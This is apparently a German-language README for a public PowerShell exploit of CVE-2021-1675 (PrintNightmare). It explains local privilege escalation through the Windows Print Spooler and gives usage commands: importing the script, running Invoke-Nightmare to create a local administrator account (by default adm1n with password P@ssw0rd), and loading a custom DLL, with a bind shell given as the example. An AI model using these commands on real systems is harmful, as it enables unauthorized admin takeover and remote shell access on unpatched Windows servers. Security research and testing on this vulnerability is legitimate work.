
PowerShell-Exploit für CVE-2021-1675 (PrintNightmare), der eine lokale Privilegienausweitung über den Print Spooler durchführt, mit benutzerdefinierter DLL-Payload-Injektion und Benutzererstellung in der lokalen Administratorengruppe.
Caleb Stewart | John Hammond | 1. Juni 2021
CVE-2021-1675 ist eine kritische Schwachstelle für Remote-Codeausführung und lokale Privilegienausweitung, die als "PrintNightmare" bezeichnet wird.
Proof-of-Concept-Exploits wurden veröffentlicht (Python, C++) für die Remote-Codeausführungsfähigkeit, und eine C#-Umsetzung für die lokale Privilegienausweitung. Wir hatten keine native Implementierung in reinem PowerShell gesehen und wollten selbst versuchen, den Exploit zu verfeinern und neu zu erstellen.
Dieses PowerShell-Skript führt eine lokale Privilegienausweitung (LPE) mit der PrintNightmare-Angriffstechnik durch.

Dies wurde auf Windows Server 2016 und Windows Server 2019 getestet.
Standardmäßig einen neuen Benutzer zur lokalen Administratorengruppe hinzufügen:
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare # add user `adm1n`/`P@ssw0rd` in the local admin group by default
Invoke-Nightmare -DriverName "Xerox" -NewUser "john" -NewPassword "SuperSecure"
Stellen Sie eine benutzerdefinierte DLL-Nutzlast bereit, um alles andere zu tun, was Sie möchten.
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll"